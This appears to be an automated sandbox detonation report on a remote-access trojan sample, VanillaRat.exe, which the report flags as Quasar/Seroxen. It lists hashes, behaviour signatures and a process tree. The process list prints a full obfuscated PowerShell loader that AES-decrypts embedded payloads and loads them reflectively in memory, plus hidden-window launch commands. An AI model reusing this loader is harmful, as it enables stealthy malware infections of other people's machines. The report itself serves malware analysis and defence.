memory/4588-90-0x0000029F18EB0000-0x0000029F18ED2000-memory.dmp
memory/4588-93-0x00007FFA7CE90000-0x00007FFA7D06B000-memory.dmp
memory/4588-101-0x0000029F19160000-0x0000029F1916A000-memory.dmp
memory/656-102-0x0000000140000000-0x0000000140004000-memory.dmp
memory/656-103-0x0000000140000000-0x0000000140004000-memory.dmp
memory/1632-105-0x0000000000400000-0x0000000000406000-memory.dmp
memory/1632-106-0x0000000000400000-0x0000000000406000-memory.dmp
C:\Windows\$sxr-mshta.exe
| MD5 | 98447a7f26ee9dac6b806924d6e21c90 |
| SHA1 | a67909346a56289b7087821437efcaa51da3b083 |
| SHA256 | c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed |
| SHA512 | c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b |
C:\Windows\$sxr-cmd.exe
| MD5 | 94912c1d73ade68f2486ed4d8ea82de6 |
| SHA1 | 524ab0a40594d2b5f620f542e87a45472979a416 |
| SHA256 | 9f7ebb79def0bf8cccb5a902db11746375af3fe618355fe5a69c69e4bcd50ac9 |
| SHA512 | f48a3b7a2e6426c0091bb159599921b8e4644c8ae83a2a2a82efc9d3e21e4e343d77339917d8aabed6d8025142a2a8e74bf1fa759edb6146bc6e39fbece9e05d |
memory/3928-165-0x00007FFA7CDA0000-0x00007FFA7CE4E000-memory.dmp
memory/3928-164-0x00007FFA7CE90000-0x00007FFA7D06B000-memory.dmp
memory/4588-171-0x00007FFA7CDA0000-0x00007FFA7CE4E000-memory.dmp
memory/4588-170-0x00007FFA7CE90000-0x00007FFA7D06B000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-08-18 13:35
Reported
2024-08-18 13:37
Platform
win10v2004-20240802-en
Max time kernel
60s
Max time network
56s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4124 created 4332 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
| PID 5264 created 6980 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
| PID 6924 created 6212 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\System32\dllhost.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation | C:\Windows\$sxr-mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-mshta.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-cmd.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Indicator Removal: Clear Windows Event Logs
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
Hide Artifacts: Hidden Window
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Windows directory
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\$sxr-mshta.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe
"C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe"
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -WindowStyle Hidden -command "& {Start-Process -FilePath 'Handlers\Handler.bat' -WindowStyle Hidden -Wait}
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
"Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{e8ef9856-2242-4506-a2b7-6fc77981a37b}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{c0b360b8-a2cb-4a57-a190-137e05dafe32}
C:\Windows\$sxr-mshta.exe
